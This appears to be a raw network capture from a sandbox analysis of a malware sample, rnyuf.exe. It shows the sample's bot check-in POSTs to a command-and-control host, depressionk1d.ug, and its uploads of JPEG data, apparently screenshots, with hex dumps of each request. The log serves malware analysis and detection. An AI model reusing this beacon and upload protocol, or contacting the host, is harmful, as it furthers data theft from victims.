                          Nov 12, 2021 22:24:31.431638956 CET17110INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:31 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          357192.168.2.450185178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:31.561638117 CET17111OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:31.584351063 CET17112INHTTP/1.1 503 Service Temporarily Unavailable
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:31 GMT
                          Content-Type: text/html
                          Content-Length: 1230
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          ETag: "5a4b7cd2-4ce"
                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 20 2d 20 d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 63 65 6e 74 65 72 3e 0a 3c 48 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 62 72 3e d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72 72 6f 72 0a 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d 6d 65 6e 74 20 6c 69 6b 65 20 74 68 69 73 20 74 6f 20 70 75 73 68 20 69 74 0a 20 20 20 2d 20 6f 76 65 72 20 74 68 65 20 66 69 76 65 20
                          Data Ascii: <HTML><HEAD><title>503 Service Temporarily Unavailable - </title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><link rel="icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /><link rel="shortcut icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /></HEAD><BODY><center><H1>503 Service Temporarily Unavailable<br> </H1></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it - over the five
                          Nov 12, 2021 22:24:31.584368944 CET17112INData Raw: 68 75 6e 64 72 65 64 20 61 6e 64 20 74 77 65 6c 76 65 20 62 79 74 65 73 20 6d 69 6e 69 6d 75 6d 2e 0a 20 20 20 2d 20 4f 66 20 63 6f 75 72 73 65 2c 20 74 68 61 74 27 73 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 72 65 61 64 69
                          Data Ascii: hundred and twelve bytes minimum. - Of course, that's exactly what you're reading - right now. -->


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          358192.168.2.450186178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:31.716537952 CET17113OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          359192.168.2.450187178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:32.009289980 CET17113OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:24:32.009524107 CET17113OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:24:32.009768009 CET17124OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:24:32.009882927 CET17126OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:24:32.032419920 CET17134OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:24:32.032459974 CET17137OUTData Raw: 4a 00 43 4c 27 34 e2 73 4d a4 c6 86 56 cf 86 7f e4 25 27 fd 71 3f cc 56 2d 6d 78 67 fe 42 52 7f d7 13 fc c5 6b 85 fe 34 4c b1 7f c1 91 d5 d6 ff 00 87 3c 21 a9 f8 96 4d d6 c8 23 b6 53 87 b8 93 ee 83 e8 3d 4d 65 e9 96 2f a9 ea 96 d6 48 42 99 a4 09
                          Data Ascii: JCL'4sMV%'q?V-mxgBRk4L<!M#S=Me/HBQ=uG1PimFU'j^7:Q=pXxUwek->uBHwh-$c>*%K+ l=1^Khh.Fz5Zu$(bi
                          Nov 12, 2021 22:24:32.032468081 CET17140OUTData Raw: 8a 5a 5c 53 24 4c 52 81 4a 05 2e 29 89 b1 b4 62 9f 8a 31 45 85 71 98 a5 c5 3b 14 b8 a7 60 b8 dc 51 b6 9f 8a 5c 53 b0 ae 33 6d 1b 6a 4d b4 6d a7 61 73 11 ed a3 6d 4b 8a 36 d1 ca 1c c4 3b 28 2b 53 ed a4 db 4f 94 39 88 0a d3 4a d5 82 b4 85 2a 79 46
                          Data Ascii: Z\S$LRJ.)b1Eq;`Q\S3mjMmasmK6;(+SO9J*yFV+M)VJJTVI)HVV+L)RZ9ZiiSL"""RM"&0LSIRUE!PwE!Ph7CJ*|lx_BJ:5i1|xss7RM
                          Nov 12, 2021 22:24:32.033642054 CET17152OUTData Raw: 55 6d 3a 39 6d 6d 34 c3 76 3c 3b 2c e8 f7 b1 c1 e5 f9 a2 f8 a6 f6 33 7c 99 db f2 e5 bb 71 5c 6d dd e5 c5 fd c9 b8 b9 31 6f 20 28 58 a1 48 91 40 ec 11 00 55 1f 41 4f 1a 96 a2 b6 e6 d9 6e b1 01 b5 36 65 3c b5 ff 00 52 64 f3 4a e7 19 fb fc e7 af 6c
                          Data Ascii: Um:9mm4v<;,3|q\m1o (XH@UAOn6e<RdJl$heJZ.'<-'aU[*S,07EWu.~PskKm\y$/4I(6%f\tw7Vr[bi#@xl z-$Ke8K.#$dT
                          Nov 12, 2021 22:24:32.055291891 CET17158OUTData Raw: 9a 70 aa 44 b1 f4 52 52 d5 12 38 53 81 a6 0a 75 52 25 a2 50 78 a7 e6 a2 06 9c 0d 5a 64 34 48 0d 3c 1a 88 1e 69 cb 56 99 0d 13 03 4f 06 a1 14 fc d5 a6 66 d1 26 68 06 99 9a 50 6a ae 2b 12 06 a7 87 a8 41 a7 83 4d 32 5a 25 0f ef 4f 0f 50 03 4a 0d 51
                          Data Ascii: pDRR8SuR%PxZd4H<iVOf&hPj+AM2Z%OPJQ%!ETPjpErrMS;u#<zNJy^]67N*h+IlFf!Ua9T]H4k*zp)U4aD{STQ{8VHma=8/lNt.8
                          Nov 12, 2021 22:24:32.055377007 CET17173OUTData Raw: af 69 17 b3 17 b1 9a dd 11 81 9a 90 51 b4 8a 50 33 45 ca 51 68 75 28 a4 c5 38 0a 9b 94 28 a7 52 01 4a 05 4b 2d 21 40 a7 81 4d 02 9e 2a 59 68 70 1c 57 15 f1 04 ff 00 c4 ba 3f fa ea 3f 91 ae d8 57 0f f1 04 ff 00 c4 bd 3f eb b0 fe 54 e9 ee 57 54 78
                          Data Ascii: iQP3EQhu(8(RJK-!@M*YhpW??W?TWTx-&)=y#]*t/<_{_)+4dG+u,C*}?Z1?T,g8G*eYo-5_3bMVF?og
                          Nov 12, 2021 22:24:32.055412054 CET17179OUTData Raw: 34 fe b0 fb 69 7b 7e 2f fe 1f fe 18 1e 1d 5e d7 fe bf ad 3d 4e 7e 2d 1b 55 9a c1 6f e2 d2 ef a4 b3 66 08 b7 09 6e e6 32 c4 ed 00 30 18 ce 78 c7 af 15 0c 76 37 93 cc f0 c3 69 71 24 a8 c1 1e 34 89 8b 2b 16 0a 01 00 64 12 c4 0c 7a 9c 56 ef 8a b4 dd
                          Data Ascii: 4i{~/^=N~-Uofn20xv7iq$4+dzVrMf]o4Ffr3[lqx[RSR=+]v/CIa.usFXzqU5'4/."{6FUf<x:j:h%i


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          36192.168.2.449820178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:30.619368076 CET4008OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:30.644920111 CET4008INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:30 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0
                          Nov 12, 2021 22:23:30.688385963 CET4008OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----ef6c84ac469cc5c9e34c56f18531b7d7
                          Host: depressionk1d.ug
                          Content-Length: 108941
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:30.688539982 CET4009OUTData Raw: 2d 2d 2d 2d 2d 2d 65 66 36 63 38 34 61 63 34 36 39 63 63 35 63 39 65 33 34 63 35 36 66 31 38 35 33 31 62 37 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------ef6c84ac469cc5c9e34c56f18531b7d7Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:30.688755989 CET4019OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:30.688886881 CET4021OUTData Raw: ed a0 ad 16 0b 8c a5 a3 6d 18 34 86 14 87 ad 2d 14 c4 25 2d 14 0a 06 14 51 41 a0 41 45 2a ab 31 c2 a9 27 d0 0a b2 9a 75 e4 9f 76 dd ff 00 e0 43 1f ce 84 9b d8 2e 55 a2 b4 93 44 ba 6f bc 63 4f a9 cf f2 aa d7 b6 86 ca 65 8c b8 62 57 76 40 c7 73 fe
                          Data Ascii: m4-%-QAAE*1'uvC.UDocOebWv@sNJhEvQE(((C@EPK@RHqlU a5dZ?*y#v1\AE-R@KK1@E-(P)hE-(&)h(-&(.(0
                          Nov 12, 2021 22:23:30.711074114 CET4027OUTData Raw: e1 ed 71 ec 61 bc d2 e6 99 a3 b1 bf 8c c6 ec 0f fa a6 23 01 fe 9d 8f a8 ad bf f8 55 5a e7 fc fd e9 df f7 f1 ff 00 f8 8a 3f e1 55 eb 9f f3 f7 a7 7f df c7 ff 00 e2 2b df 78 8c 1f 27 b3 e6 56 3e 75 61 f1 9c fe d3 95 dc d0 f0 77 88 26 b9 bb d2 b4 2b
                          Data Ascii: qa#UZ?U+x'V>uaw&++1\PA>W|n/z|/[EuqfCp(Tc*=GzQhyIU;GEP/E^4.J9\aAdq~?.J
                          Nov 12, 2021 22:23:30.711117029 CET4032OUTData Raw: cd 17 b1 5a 03 2b 47 74 64 72 64 90 2e 4f cc 9b 30 e7 82 17 19 e2 b6 34 4b 5b 7b 4d 32 c7 49 d4 75 cb 2b 49 35 b3 33 de 43 30 99 e4 75 70 63 81 83 22 32 70 e1 9c 65 87 50 7d eb ce bc a5 f4 a0 42 80 74 eb 4d d1 6d 38 f4 62 55 52 7c dd 51 e9 90 af
                          Data Ascii: Z+Gtdrd.O04K[{M2Iu+I53C0upc"2peP}BtMm8bUR|Q{sMm<goN+G3CIm)(n$98XB):b3%V-Y/[b-.U#\t<|G>ZcTN{jc+_A(QE)E@F(QEQE
                          Nov 12, 2021 22:23:30.711195946 CET4037OUTData Raw: 09 34 1d 3a 58 56 16 8a 51 10 2e 4a 25 c4 8a af b9 8b 30 60 1b 0c 09 27 83 91 c9 a3 a0 75 32 12 fe 79 35 c7 ba 96 39 1e ca 3b a4 b5 89 d2 ed 90 02 c8 b8 3e 50 1b 5c 12 dd 58 e4 67 81 c5 3b c5 3a ba 5a 5c 41 6c ba 94 36 72 c5 1b 5d e1 e6 58 fc d2
                          Data Ascii: 4:XVQ.J%0`'u2y59;>P\Xg;:Z\Al6r]X,|CUt{~Aa&@vU;Q14CI\{u==h[9>'LXVp\CShwwW~$&yKoos 7ZiQK1<fYqAd1,9b@
                          Nov 12, 2021 22:23:30.711316109 CET4043OUTData Raw: db 65 64 2e 32 c4 9e 1b bd 59 ba f1 46 b7 79 77 f6 c9 66 b3 17 67 cc dd 3c 56 10 47 23 ef 42 8d b9 95 01 6c ab 11 ce 7a e7 ad 3f 67 57 5e fe f7 e3 b7 dc 39 54 a6 d9 ad 35 ac 1a 57 86 f5 4d 67 4e 82 09 ad a5 b8 b3 9b 4e 9a e6 dd 25 d9 1b 89 c3 c6
                          Data Ascii: ed.2YFywfg<VG#Blz?gW^9T5WMgNN%CV]9>zh<Akv[h(BKrW8qQB}n1nT#C<j-t80Q~!~fzUli0HPJLO X`&
                          Nov 12, 2021 22:23:30.711352110 CET4048OUTData Raw: 0b 7d 77 30 fe 40 57 b8 57 ce de 3a d5 d3 59 f1 7d f5 c4 4c 1a 08 d8 43 11 1d 08 51 8c fe 27 27 f1 af 85 e1 aa 72 96 2d c9 6c 97 e6 7d 0e 6b 24 a8 a5 dd 9c e1 a4 a5 a2 be ec f9 e1 29 d8 a4 a5 a6 23 eb bd 30 ff 00 c4 a2 cb fe b8 27 fe 82 2a 08 0e
                          Data Ascii: }w0@WW:Y}LCQ''r-l}k$)#0'*}]ZOm#>nU9V#w.Qg\A[E$me?M$*E;;~3:(Iv<7Z4my(;KqY^,[Z}lZA1WR{5`Om}sUomb>
                          Nov 12, 2021 22:23:30.733799934 CET4054OUTData Raw: fd b9 33 78 2f fe 11 d9 6c d1 d8 4d 1b a5 e6 fc 3a c6 9b c8 8c 8c 72 03 48 c4 1c f1 92 3d 30 f1 af cb fd b3 6f a8 7d 8a 36 48 ac 23 b0 96 de 47 25 66 8c 44 22 6c 91 82 37 0c 9e 3a 1f 5c 55 7e fe ef fa e9 fe 64 3f 63 fd 7a ff 00 95 cb 96 d0 78 7b
                          Data Ascii: 3x/lM:rH=0o}6H#G%fD"l7:\U~d?czx{PtkYZ[\F5r!*$FnTPyB_GC]i6z4uXXKS6F_M8q{rKL5_Xm-bKU
                          Nov 12, 2021 22:23:30.733845949 CET4064OUTData Raw: e2 bd cc fc 1a f0 77 fc fa dd 7f e0 4b 57 8c fc 39 ff 00 92 85 a2 7f d7 c7 f4 35 f4 9d ce aa d0 df bd 9c 3a 75 dd dc 89 12 4a e6 13 18 0a 18 b0 1f 7d d7 9f 91 ba 57 9f 8a 73 f6 96 8b e9 dc ef c3 28 72 5e 4b af 63 90 ff 00 85 35 e0 ef f9 f6 ba ff
                          Data Ascii: wKW95:uJ}Ws(r^Kc5w*\$c1P+-Vh,]pGyMsf_'3}}U+(,+}wc~4Vd8^]f{tp(;
                          Nov 12, 2021 22:23:30.781750917 CET4118INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:30 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          360192.168.2.450188178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:35.863840103 CET17223OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          361192.168.2.450189178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:36.249696016 CET17224OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----aa227d1941f848e55ff8e80a839e1f4c
                          Host: depressionk1d.ug
                          Content-Length: 106956
                          Cache-Control: no-cache
                          Nov 12, 2021 22:24:36.249784946 CET17224OUTData Raw: 2d 2d 2d 2d 2d 2d 61 61 32 32 37 64 31 39 34 31 66 38 34 38 65 35 35 66 66 38 65 38 30 61 38 33 39 65 31 66 34 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------aa227d1941f848e55ff8e80a839e1f4cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:24:36.249995947 CET17234OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:24:36.250128031 CET17237OUTData Raw: 44 df f3 ca 4f fb e4 d1 e4 4d ff 00 3c a4 ff 00 be 4d 74 5f 6b b9 ff 00 9f 89 7f ef b3 4b f6 bb 9c 7f c7 c4 bf f7 d9 a9 1d ce 73 c8 9b fe 79 49 ff 00 7c 9a 6b 46 e9 8d e8 cb 9e 99 18 ae 93 ed 77 3f f3 f1 2f fd f6 6a 8e b8 cd 22 59 33 b1 66 31 b6
                          Data Ascii: DOM<Mt_kKsyI|kFw?/j"Y3f1I9?x=Q@PREQHhh)hI#;WJ? :FLPS[TTGO$y+\Tuw((Z()iqF((%Sb-(-EE-R1@
                          Nov 12, 2021 22:24:36.272340059 CET17240OUTData Raw: 6b 9b bd 2b 42 bd c9 b9 b2 bb 73 1b 75 ca 08 65 04 13 ec 48 1f 4f a5 79 b7 c6 ef f9 28 f2 ff 00 d7 ac 5f ca bd 47 c2 fe 01 d5 b4 5f 11 da 6a 37 57 16 6f 14 3b f7 08 dd cb 72 85 46 32 a3 d4 77 af 2e f8 db ff 00 25 1e 6f fa f6 8b f9 57 91 8a 74 9e
                          Data Ascii: k+BsueHOy(_G_j7Wo;rF2w.%oWt!:NaXjdy-IQEzOO\~ A<\H+><Ew=5kg=k*^UHTuTtvs <?iV9odc$c'qn</
                          Nov 12, 2021 22:24:36.272387981 CET17242OUTData Raw: 2c ac b7 93 21 52 c5 d9 33 80 41 c0 0a 4e 4e 40 af 02 ab 0d 65 76 b2 4f 1b 5a 4e 1e dd 77 cc a6 33 98 97 20 65 86 38 19 23 93 ea 2a 29 21 96 21 19 96 27 41 2a 6f 8c b2 91 bd 72 46 47 a8 c8 23 3e c6 b6 a3 45 53 6d de ed ff 00 5f e6 61 8a c5 fb 68
                          Data Ascii: ,!R3ANN@evOZNw3 e8#*)!!'A*orFG#>ESm_ahFaz_Ch (EPIKIH(G4Q0J^i(E- JJ(O[I?ZN<E{Ci k'RVL,8-q;oi{4 e`w}c
                          Nov 12, 2021 22:24:36.272433996 CET17245OUTData Raw: c0 ee 0a e5 1b a1 e3 e6 52 39 f4 aa d4 8b 1a a7 4a 75 6f 1b db 53 19 5a fa 09 45 1d a8 a6 20 a2 8a 28 00 a4 a5 a4 a0 61 4a 28 e6 8a 00 28 e6 8a 31 40 82 8a 28 a0 02 8a 28 e6 80 0a 28 ef 45 00 38 52 d2 52 d3 11 bb 69 ff 00 20 7b 7f fa e9 27 fe cb
